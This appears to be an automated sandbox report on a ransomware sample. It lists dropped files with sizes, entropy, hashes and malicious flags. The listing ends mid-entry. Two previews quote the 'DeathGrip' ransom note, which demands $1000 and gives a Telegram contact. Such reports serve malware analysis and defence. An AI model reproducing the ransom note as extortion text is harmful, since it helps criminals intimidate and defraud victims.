                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.104209848351332
                                                          Encrypted:false
                                                          SSDEEP:6:SOlWVtyrfyRYojLm0XuSVDJQ+BejQeYGbq0kmGSTEdY8yzPhMj:STtyr6RYo2udVDJQ+BnexbCmGXdlyzu
                                                          MD5:A2173FDC097385FE6247109C5D386D7B
                                                          SHA1:12BA652F7CED4A92017EE405952DC2F9EE5E6E84
                                                          SHA-256:0A459C5DDB6082FB76DBA19774DA4D315EA7750E8D10412403EBE0FE493BCBCB
                                                          SHA-512:A431B699715420ED7BB76CF1FB6CE130A044C12AB98D139660ACD66026451F55501AB4D24D6C538D91F51F8A0C4142C3C351FFA664A8BA9F53267F574FAFAEFB
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2784
                                                          Entropy (8bit):7.905071488037961
                                                          Encrypted:false
                                                          SSDEEP:48:sAqyVYRd+x+hqyR0Yslc69aQhdQUtOM64OKspkpreoX1ZiMhTqxQ4JPObBLFLQVd:sRyVE4xG30hc691LHgM64HPl1vhSPqZY
                                                          MD5:9E528AD330F41DE57FB6D8A466BF4A1E
                                                          SHA1:81505D5F4629E4A9AE15EE19AD75B01AC2903085
                                                          SHA-256:97CD0A2BF107F3B2DB50A5F97C40A28D888E356816D1CD5F53AA468E88870377
                                                          SHA-512:896292355B8A21425F93BA17B8C54124A4AC1AE566F74BE172A1DE1FE7414F39DA98267711D61CAE2E3E6C4E47DAA140268F791C7974930FC58454788A3CEB07
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8320
                                                          Entropy (8bit):7.977197723749569
                                                          Encrypted:false
                                                          SSDEEP:192:D7OLbgtCE6BEq76kT6X84AztgMGNDGOcxE2+:DawtTWTK4zOTGpS
                                                          MD5:8CF85B95EAEB0121167FEE79C2DB4717
                                                          SHA1:31067F5B3E2DFDA54B7D66C84C229C36B725F71E
                                                          SHA-256:7C65B580CB43EEF721C87A4112569B71E8178B47D2B7C1AB523BD4DAE495B5F1
                                                          SHA-512:1C5C454965AAC6EB288E88AA807B665DE5918EBD567F9B261BE595F67331E83A977051C557A5183E50F333B856DF70A984D441632D149C9A31EACF0E5C1C4F93
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6048
                                                          Entropy (8bit):7.960260403067683
                                                          Encrypted:false
                                                          SSDEEP:96:UO9WHFoZ1mCNgTM80Wt/jAPHjp+iPAFwNq1YVblO+vOBg5WvG1aaSN8y2Rm+Gqcg:UwMFoZ1mC+BtcPjH4Wq1YtlOu89eoqya
                                                          MD5:8160FF39904DBFB1E91831A538F94558
                                                          SHA1:8C9DF74593A7658D189BFC5A7B606CBF8C8C0F7C
                                                          SHA-256:90D3D4103DFCE0B2AF95DB3FEEBBEB488A52048AF33B3CB9C3804969DD33AB8C
                                                          SHA-512:1EBA01EB01439573BDBB5AFF58028AD7D6E18ED69710D5C0747D97B1BDE63F680847873FF3C9DB5C8BD5BCF4AE116C6B1C966CA6DC0C23D32027E09411A9E30B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19952
                                                          Entropy (8bit):7.990184391616252
                                                          Encrypted:true
                                                          SSDEEP:384:LnhPftMf+HyKaC/rJSR8DQJ+URdkLvhaAMVl/5jXJ2a1NyCj2UGGA:Dw16yZqlMVlhjXJ2qN7lE
                                                          MD5:46B77B6A6F111CFDC5842D02D8311A50
                                                          SHA1:830E45CF4E975DF9EC9510542521DAD5282DF4F1
                                                          SHA-256:536856134E9F5574E12990E5411A6873672F3345E7EE3FA4D50E2E47D95398A6
                                                          SHA-512:92AF7BB5D4C7749E67D3DC28F42198D7D8C78940F0C7A5F6B73AA55E65E02038CF0D0EB2A32BFA88ABF5E010641F0DAF6241A01C22F715098353B6FF1B2C71F2
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):7.877378208729302
                                                          Encrypted:false
                                                          SSDEEP:48:j0HGHB955NWfJvs5ZHZsc1hqTIvjxyGUw8HF/ywZCWgIL4Z:gOB9vIRqhZsc1hqTKxAwuF/bZCWgV
                                                          MD5:D23801297B5C6332FBA867B75F4A61BB
                                                          SHA1:A91772AE5001248A186B5D27B8CF02BEE8E314D8
                                                          SHA-256:A9B9D642841748B4CA145EFCCE9EB4612B01F2B204AA2D522FC6C17F861E7506
                                                          SHA-512:1ABC3636BF7AD4F7BD09FF36EFD085B1DCF2017C68AEFC3C844A71EBE4CE6ABECA4D151ED08A9A7CD2720F19F028A51CF2F138E56D5DEFC2B8090E2FE6BF55E8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3232
                                                          Entropy (8bit):7.921633172654192
                                                          Encrypted:false
                                                          SSDEEP:96:D8LxukE8iG+6JDSz9KkpFDwheV5iT6NyhHAE:D8LAZG+6Jk9XDwhGkT6ohgE
                                                          MD5:9A4D688017CA15F7F51822269C7A17C5
                                                          SHA1:FC1A38E326C9155F9DCDB3050E3E08F794B257FB
                                                          SHA-256:6405A0F106F163F8295127C1D767BD83E122E81F3F46A645E2AC21976853BC15
                                                          SHA-512:5073ABC2A34E9102337BCF7B7D7E7F385736AD5C69B956EE1B1CE0CFB7E07E57D6C434062E1539FE2564396E8E7F157AC7D2546094E15CA50D8BE6B9F8A0A8F0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4192
                                                          Entropy (8bit):7.944583907047699
                                                          Encrypted:false
                                                          SSDEEP:96:EU2ZBIgIzgD71yZQndFVxRcF8dnU/rFEbKVwUp8abOSIsT:EUymgIzgC2FSF8VarybKVBnes
                                                          MD5:007790307BA2250E37FEA750DA1C5DE4
                                                          SHA1:A3A026F08379E02ECC2E583707A5A324FB4190B8
                                                          SHA-256:B6DF39A81485EE741CF99D88E7F0DF3ACAF91394F0584F9612B5E635305A7823
                                                          SHA-512:EEFA4B79C12B23DE5F4789599B7DB08CC6C170834E65A009681FCAACB28863BE59035C5A1B0FDFDC7790EDC462255898891ABD1C1BE7D22AE71F84913AA5BB59
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6128
                                                          Entropy (8bit):7.9611952287210155
                                                          Encrypted:false
                                                          SSDEEP:96:1lamXI46YpcThGozWqIWyJpEjFSUdnMS/5AUXzIFWq5jx5RCnGIWr9nJFGJFQ6bZ:5I5aqwWFSUnWUD5YfRCnGIWZObQeyQ
                                                          MD5:F8E3F653FD14B7AB2DEDCDCEDD68092C
                                                          SHA1:957150DA410A31AC2B656DCFF58F8AD9AA908394
                                                          SHA-256:1128B625EF889008A6054476DC8A281813ACE27F206CD2CA184264D7C2F4B444
                                                          SHA-512:6A8D0B4E7F3A6C4A32936330DA085212CDB886787C4CAB4A0B8B39C73AF16E7E9BC2BF9BD8AD8AAA3D55F28AF65659A71C6D0A6046E6F449F7FFCD90BA3E9576
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10432
                                                          Entropy (8bit):7.984883949985019
                                                          Encrypted:false
                                                          SSDEEP:192:XlnGcM3dTGmC06DBfLQb3X6u601nKhI1R0aRYMsSFpK47uaGbpKLeelQQ6:1GR3B5C06NT61naix3pK47uaGbYLlS
                                                          MD5:060CDC67E3DCC8077866F17A787AF4E6
                                                          SHA1:3C66EBA0CC198C74121166F3837B1B73093B0510
                                                          SHA-256:88FCBFAB25CB76BDACB571500ADCB9436D387380981BFEBD74A55871D5792322
                                                          SHA-512:DC794FF5CD36A7DED52738E1657BCDA40EDE2ECB176281F5CAB269993AF096AE1FEDD8B17AD845868FA95F9793DB277ED0C5DB394C845E291898F9FAAA523F47
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7312
                                                          Entropy (8bit):7.968168307650323
                                                          Encrypted:false
                                                          SSDEEP:192:NvVozL5xxzuq2uaMZ1xYFxo9KbFU9yRjUVurfm8gJ:DuxR2uhyo9iU8dUVMmVJ
                                                          MD5:74C1EC95C528220DF77B3617A90BBC48
                                                          SHA1:156A110AB02F8A3D232A4FD610197633BE571C80
                                                          SHA-256:4D070370E33248455E9D0BE1F129EFB4A104E7E2580A1E1BF4D5CED32EAB2AF1
                                                          SHA-512:0556BA657825CA8D569DA21BE290EF647E18BA569BEDF4B78D9BEF5225A489CBBED4D5D0385CCDEB4BDA927892D01540FA7DDFCCEE717535AECFD202337C49A7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25696
                                                          Entropy (8bit):7.99119668899421
                                                          Encrypted:true
                                                          SSDEEP:384:SiBN4e5fxmhECCw1BZlviMJYllyyr4iY+DmJj0u4Bqq+uGazVb0IeMkaecH/Yxmj:f5WCwPXqD94i7DmL4B+QaAVe2/6vS
                                                          MD5:13AFE528602BA931975E2DDDF15FC4AD
                                                          SHA1:7BE113B16DE3C68846AB03B043658F6F41A41CB8
                                                          SHA-256:CDEFA42A325A75858FF0D60D375EA9447822D502AD65DBA2F3C18A519525F791
                                                          SHA-512:8D358937103FEDFB114DCC12B9FFEC85D2F216816A45721B88C04DE9E845CE91AD675B9846594362574981B7E58D24135D01FA30545BBE806A456D0259F542E8
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.837763560277669
                                                          Encrypted:false
                                                          SSDEEP:48:DPFCZsqjNeWHhqCmkiOSKwFRnn54YutnJokUckfNSZX:DPF8enFkiO6Hnn5stnOkGOX
                                                          MD5:CE71AFF78CDFAF6F8791D955C3E8941F
                                                          SHA1:B63CCCA05B0DC40F33713C7616B1A7EE72E19244
                                                          SHA-256:DDB34DBABBA3BBD9EC05349D3A137FE63DF196EE5DDB9DFC8B8892C9D5242AE4
                                                          SHA-512:12AF61E4DB6FA392C4667D3514A552B1C9D0DE314BA33180714F2A17F9606CDE7845E5742A5BEF565C69F0E791AADF94933D23D737B6AAA620C8FBA91E115D88
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2768
                                                          Entropy (8bit):7.908298847564416
                                                          Encrypted:false
                                                          SSDEEP:48:CV8qYxyLWNHXwAaVU07x6gMwYK7iWoflyXa0rTaUHvJxMYF7Pt/4ra0GCCALOQ/h:C+RxXw5kgsK7pofcZR3BFwFDOfk
                                                          MD5:6AB98B2224A571A51DF6230B79AB80AD
                                                          SHA1:F0B77EC834CB405B7E9EB8D44713755D6CA3BD5C
                                                          SHA-256:B0D4C82D1CDC01850B0DFEA19E519791AFC211E77DB9F03A31AF7201B9664407
                                                          SHA-512:B9EC5751C1FE9E2B52B5C2D869C0553BF45826C6E0596734E9178FAEF17CD4CCCE670052332763033F383180955415644616C9EDEB0D5250CE67AF56FA815C21
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4144
                                                          Entropy (8bit):7.930964293958973
                                                          Encrypted:false
                                                          SSDEEP:96:yUBL16j7UcbpJxXNlKQbOyKSdloeR0qZexHjqK3F/DDF:dKAcbpJxXNlKqOy7boyhAeK39vF
                                                          MD5:86108124BAABC97D30AF568A4F07E491
                                                          SHA1:B6DB48652F08365731DD242DC9707C573E6932C2
                                                          SHA-256:6A3EDD1000F7610C25BF3DCB76F0BCE250C9520E1524DF57CDD241A57E1B26FF
                                                          SHA-512:E990E3F6E6B86F4ED7A0F34CE581FCF5012CA2233D93AAFFB6AA236751624B6F77C19C6C76D6D5422AED85F4A61779FA59CD934492704293A6B972B22F0007CD
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7072
                                                          Entropy (8bit):7.967985126680914
                                                          Encrypted:false
                                                          SSDEEP:96:yJ5aji5RlVY7LnkG08kM0EqviRTHU3qK5GoiD2NwpNb0ZC3kLcZuUoeQoSRUJ4hy:I6MEHkV8kjEVT63Bwpp3NZuVenSRUP
                                                          MD5:7B1483C645EE12A3B8604B71F3BF72DA
                                                          SHA1:E7CFAD93AAD7BF1A9A1C3FECA821AEA51D489BE9
                                                          SHA-256:C9A994BECC898F8919D997082CD5861F09CD43FE2E2BF789C93D9923F48E2B0A
                                                          SHA-512:C2A69EDAAB55FA1D966EE79A1B27C7BFFEEE51020188565F3ED1DBA268DD4E75C411069AE31EAFCA62BCE4698E6CB844751E43DDDA8446C0248EE0D847121C58
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):7.901757161387217
                                                          Encrypted:false
                                                          SSDEEP:48:BIItdOgNpntojXBEvTTzW/Ae4cwkn+eO/M1iy8LCwA4BfKTmSB0xEB8f:aGk0y4W/AJzk+eO/M1iyyCiBSTj0xEBc
                                                          MD5:FDBED7AD9BA18C57314485EBF7646D33
                                                          SHA1:D8A72D403D76DF07E9D94768E106D56C84688548
                                                          SHA-256:69B7BDB7916F9FF0FD7FFAB046EE9C18B7DAA23BF581F878EE51BB34FAEC1CA5
                                                          SHA-512:F0F62C3B26DAD4EB18E3345276BBCAFD52BF14CA54CC50862AF15D2F7DF6BD83C6AAB7A8F3418386AECDD583E9FEFE8E57091320403FFA82E9B62981B389B8BB
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.785286843779543
                                                          Encrypted:false
                                                          SSDEEP:24:8CQGVp8O+wQafipjFZ59mu02YHBPglD3IMIp9kHwhcHguWjPY9kjCHoHDGhWR:/QTwQafiTv9m52QB4lmkQhn3tjzKYR
                                                          MD5:39001B0B88661A3627CA90471A8767F5
                                                          SHA1:7EAC61E621FFF73D7A55B86134564F4FC4391788
                                                          SHA-256:97802E36D36A7044C716DB3BC8E920A2D8B5732BB318C0DFECEF2CD0B9BA5788
                                                          SHA-512:698FAD57FCD7D5A656CA44FC5E5DB0CE19F03BD64B12296825347A74BE1486242E00E0D87F1CF46525246ECEE67824B8A954DFAF1F10F9BC7568B7B26EDCEC91
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\main.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2128
                                                          Entropy (8bit):7.867961509221451
                                                          Encrypted:false
                                                          SSDEEP:48:oSvMNP7+IzLEVYhw3OPu91UTuZhekc8gp8C+uCcPOyFwj+:oSvMZUYi99XZNcPR1eS
                                                          MD5:046AA3EDC99D9980E9EBEE3B7982A9FE
                                                          SHA1:B39D6C4FBCCBDD35650EA52E503BA845B985D8CC
                                                          SHA-256:5B213852F0C30A9DC723F3CA66D1D92527DFBD0C77F1A2F613565D6B6EB90DB7
                                                          SHA-512:590DFD9ABBCCF657CBD6A6801DAC53E0CBAFCF76226E50575645CFB331CCB78DD0533A41AEDCE4FE73E042765C8A451E0C8DBFDB6D38CAFB1A559F6FF00D0DFB
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1296
                                                          Entropy (8bit):7.7181468472135775
                                                          Encrypted:false
                                                          SSDEEP:24:6Wf+K7AgchRSvaSl3dcGGCXMax37YZj54Zg+Wfus2KhAfS9kd6spe0On:j+oAgc74bGCXMax37YZj5bL28OS6/7O
                                                          MD5:916E94550214E68CD474800DCE824ACC
                                                          SHA1:F11044AF74D2CE5E95A99AF1DA5265A2EB6812EA
                                                          SHA-256:5198309CAFD32E25C3579946C314C5E6204104DFCD45538CC477C04B6A02CE5B
                                                          SHA-512:4496AA4EB278CD8893E18A441F8D59368473CEEA969C20633F51FC62D5FEC1ABF076F0BAF9D52983B336F12C4C7FFCDED726D101FC20DF7DFAD3BEEEC9B0B930
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1280
